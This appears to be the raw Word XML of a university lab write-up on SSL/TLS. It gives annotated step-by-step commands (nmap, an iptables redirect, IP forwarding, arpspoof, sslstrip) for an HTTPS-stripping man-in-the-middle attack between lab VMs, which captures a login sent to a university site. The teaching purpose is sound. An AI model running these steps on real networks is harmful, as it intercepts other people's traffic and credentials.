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6184B8" wp14:paraId="79865AF9" wp14:textId="756389BB">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="60" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="27DF2793">
        <w:rPr/>
        <w:t>Security Protocols</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7D6184B8" wp14:paraId="796249E4" wp14:textId="78D0CF8D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="60" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="7D6184B8" w:rsidR="27DF279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52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab 4: SSL/TLS Writeup</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7D6184B8" wp14:paraId="2DC2BF59" wp14:textId="651433DE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7D6184B8" wp14:paraId="624125DA" wp14:textId="16D633AC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D6184B8" w:rsidR="27DF2793">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Author: Antonie Soga</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7D6184B8" wp14:paraId="39531544" wp14:textId="2952D373">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="68768AA6">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using Kali for HTTPS MITM attack</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="589D6BDF" wp14:textId="125F672C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Download any target virtual machine template. Import it in VirtualBox and bind the network interface to the “Bridged adapter”. You can get VirtualBox images here:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="13F7DE59" wp14:textId="1B65687D">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="720" w:right="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="Rcace521812b54d8a">
        <w:r w:rsidRPr="4DBEEEFE" w:rsidR="60C84E79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2"/>
            <w:szCs w:val="22"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.osboxes.org/virtualbox-images/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="7381D333" wp14:textId="160A8421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Download a Kali virtual machine template.</w:t>
      </w:r>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="60C84E7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Import it in VirtualBox and bind the network interface to the “Bridged adapter”. A Kali virtual machine template is available here:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="773C045F" wp14:textId="49F9934B">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="720" w:right="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="R69bfdd060eff4161">
        <w:r w:rsidRPr="4DBEEEFE" w:rsidR="60C84E79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2"/>
            <w:szCs w:val="22"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.osboxes.org/kali-linux/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="27CCF56E" wp14:textId="6DF142C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Start both virtual machines. On the target, also, turn off the firewall. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="4E3E6DC5" wp14:textId="4EF69EEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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 Kali:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="6501502E" wp14:textId="0844C8D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Find the Victim IP Address:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="478DBB67" wp14:textId="5193EA3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="220" w:beforeAutospacing="off" w:after="220" w:afterAutospacing="off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Get the network IP, mask and default gateway of the connected interface and compute the whole network IP/MASK: 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ipconfig ;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route –n</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="68304001" wp14:textId="66502181">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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We assume that the network is 192.168.88.0/24. Scan the network for our target machine and get the target machine IP: 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nmap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-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sP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192.168.88.0/24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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="44D32915" wp14:textId="37B9626B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="434B9531">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="3AB16235" wp14:anchorId="1268CF62">
            <wp:extent cx="3415513" cy="1842343"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1120343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343389" name="Picture 1120343389"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId643195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5513" cy="184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BEEEFE" wp14:paraId="6EED3D7A" wp14:textId="591B4409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Run the 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SSLStrip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tool. Assume that the target IP is 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192.168.</w:t>
      </w:r>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="66E8A77E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88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.1</w:t>
      </w:r>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="1B2091B2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29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the gateway IP is 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192.168.</w:t>
      </w:r>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="3011AE9B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88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.1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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="77E05E22" wp14:textId="447889CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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Route traffic inbound to Kali to the port that SSLStip will be running on, which is port 10000: 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iptables -t nat -A PREROUTING -p tcp  --destination-port 80 -j REDIRECT --to-port 10000. </w:t>
      </w:r>
      <w:r>
        <w:br/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-t nat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→ this table is consulted when a packet that creates a new connection is encountered</w:t>
      </w:r>
      <w:r>
        <w:br/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-A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→ is an instruction to append one or more rules to the accepted chain. PREROUTING -&gt;is one of the built-ins of the NAT table option. It is for altering packets as soon as they come in</w:t>
      </w:r>
      <w:r>
        <w:br/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-p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→ specifies a protocol, in this case we said tcp. </w:t>
      </w:r>
      <w:r>
        <w:br/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--destination-port → we specify port 80 as the destination port. </w:t>
      </w:r>
      <w:r>
        <w:br/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-j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→ specifies an action. And we follow that with the action of redirect (REDIRECT). We redirect to port 10000 because this is the port SSLStrip listens on by default.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="3D14ECDF" wp14:textId="109A4831">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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Active IP forwarding: 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echo 1 &gt; /proc/sys/net/ipv4/ip_forward. </w:t>
      </w:r>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="60C84E7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Remember!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In order to do any MITM we need our box to act like a router and be able to forward packets that does not have its IP address in it as the destination.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="0BC5D889" wp14:textId="23D2C4E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off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Use the 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arpspoof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utility. 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Arpspoof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tricks your victim into believing that you are the gateway, when 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you’re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actually just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another machine on the network: </w:t>
      </w:r>
      <w:r>
        <w:br/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arpspoof -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eth0 -t 192.168.</w:t>
      </w:r>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="4BEF6766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88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.1</w:t>
      </w:r>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="705688D2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29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192.168.</w:t>
      </w:r>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="5D489E71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88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.1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="4B9D2756" wp14:textId="3B1C42F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="4577E21C">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="3A52414D" wp14:anchorId="70A0F00E">
            <wp:extent cx="4207333" cy="1206911"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1053247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247828" name="Picture 1053247828"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1609370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7333" cy="120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BEEEFE" wp14:paraId="3FCC181F" wp14:textId="1B55703B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2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Open a new terminal/tab and run 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SSLStrip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  <w:r>
        <w:br/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sslstrip -l 10000 -w logs.txt</w:t>
      </w:r>
      <w:r>
        <w:br/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-k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→ kill all the sessions in the progress (forces the target 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ssl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session to restart if already going, allows for the tool to work on sessions already established), </w:t>
      </w:r>
      <w:r>
        <w:br/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-l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→ listening on port 10000. </w:t>
      </w:r>
      <w:r>
        <w:br/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-w </w:t>
      </w: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→ write the logs into /root/Desktop/sslstrip.log file.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="335C89C9" wp14:textId="3F63D0A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="69B95020">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="4EABDA08" wp14:anchorId="6F69808E">
            <wp:extent cx="2890986" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1918482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8482518" name="Picture 1918482518"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2032861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0986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BEEEFE" wp14:paraId="526C304F" wp14:textId="389CCDAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="both"/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Open a new terminal/tab and run </w:t>
      </w:r>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="60C84E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watch -n 1 tail logs.txt</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="09BAD674" wp14:textId="72B1971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 the target virtual machine:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="6D3C587B" wp14:textId="2075370F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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Open a browser and go to “</w:t>
      </w:r>
      <w:hyperlink r:id="R14cd530153f24590">
        <w:r w:rsidRPr="4DBEEEFE" w:rsidR="60C84E79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en-US"/>
          </w:rPr>
          <w:t>https://curs.upb.ro/</w:t>
        </w:r>
      </w:hyperlink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”, input a valid email address and a fake password</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="57767F47" wp14:textId="26FF9171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="005C617A">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="7952A594" wp14:anchorId="2C0B0315">
            <wp:extent cx="4056939" cy="2691622"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1481655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1655766" name="Picture 1481655766"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1871044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6939" cy="269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BEEEFE" wp14:paraId="2EFDC251" wp14:textId="4AED37A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60C84E7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View the https request in the Kali terminal that displays the content of logs.txt</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="0F816F90" wp14:textId="309CC27D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="5D569F32">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="50C4335A" wp14:anchorId="339234EE">
            <wp:extent cx="3289331" cy="1177661"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="226691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691867" name="Picture 226691867"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId923457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9331" cy="117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6184B8" wp14:paraId="3138FE72" wp14:textId="298FBEA3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="0DAE1A60" wp14:textId="7A086953">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:beforeAutospacing="off" w:after="120" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="4DBEEEFE" w:rsidR="20AFA0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Tasks</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="0B834D6E" wp14:textId="5724426D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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20AFA0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[8p] Read and run the commands from this document.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="4142CEDE" wp14:textId="315AB238">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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DBEEEFE" w:rsidR="20AFA0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[2p] Starting from the ZIP skeleton, complete the C file in order to create a HTTPS connection to verisign.com and read locally, in a file on the disk, the main home page. Use a GET request. The HTTPS port is 443.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4DBEEEFE" wp14:paraId="2C078E63" wp14:textId="6BD736F6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="20AFA062">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="5BC03056" wp14:anchorId="4C63CBFE">
            <wp:extent cx="2770052" cy="808342"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="196963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63984" name="Picture 196963984"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId120915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0052" cy="80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AFA062" w:rsidP="4DBEEEFE" w:rsidRDefault="20AFA062" w14:paraId="7E1D52C8" w14:textId="54807F22">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="20AFA062">
        <w:drawing>
          <wp:inline wp14:editId="1461263D" wp14:anchorId="0CD00A6C">
            <wp:extent cx="4772651" cy="3839374"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1308570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8570871" name="Picture 1308570871"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId921895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2651" cy="383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aafa2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d7ed79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1076f6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2c36c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A55570"/>
    <w:rsid w:val="005C617A"/>
    <w:rsid w:val="04A39C2F"/>
    <w:rsid w:val="173A2C51"/>
    <w:rsid w:val="17765B95"/>
    <w:rsid w:val="1B2091B2"/>
    <w:rsid w:val="1B280AA2"/>
    <w:rsid w:val="1B4D01EE"/>
    <w:rsid w:val="1C138AB2"/>
    <w:rsid w:val="20AFA062"/>
    <w:rsid w:val="23152C14"/>
    <w:rsid w:val="23A55570"/>
    <w:rsid w:val="24A6E9DE"/>
    <w:rsid w:val="27DF2793"/>
    <w:rsid w:val="2E21289A"/>
    <w:rsid w:val="3011AE9B"/>
    <w:rsid w:val="3F610642"/>
    <w:rsid w:val="434B9531"/>
    <w:rsid w:val="44AEF9EA"/>
    <w:rsid w:val="4577E21C"/>
    <w:rsid w:val="46FA3E26"/>
    <w:rsid w:val="4BEF6766"/>
    <w:rsid w:val="4C01A94B"/>
    <w:rsid w:val="4DBEEEFE"/>
    <w:rsid w:val="59DE3831"/>
    <w:rsid w:val="5D489E71"/>
    <w:rsid w:val="5D569F32"/>
    <w:rsid w:val="60C84E79"/>
    <w:rsid w:val="65A4AF97"/>
    <w:rsid w:val="66E8A77E"/>
    <w:rsid w:val="68768AA6"/>
    <w:rsid w:val="69B95020"/>
    <w:rsid w:val="6E2A289B"/>
    <w:rsid w:val="705688D2"/>
    <w:rsid w:val="749D705B"/>
    <w:rsid w:val="767AD652"/>
    <w:rsid w:val="7D618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55570"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E521CE91-7AB9-409C-9960-14F807B710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DBEEEF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DBEEEF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osboxes.org/virtualbox-images/" TargetMode="External" Id="Rcace521812b54d8a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.osboxes.org/kali-linux/" TargetMode="External" Id="R69bfdd060eff4161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="rId643195175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="rId1609370773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="rId2032861375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://curs.upb.ro/" TargetMode="External" Id="R14cd530153f24590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="rId1871044074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="rId923457541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="rId120915411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="rId921895886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R9c77c71c442f40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2025-11-16T11:50:37.2933979Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T23:44:46.2685243Z</dcterms:modified>
  <dc:creator>Antonie Șoga</dc:creator>
  <lastModifiedBy>Antonie Șoga</lastModifiedBy>
</coreProperties>
</file>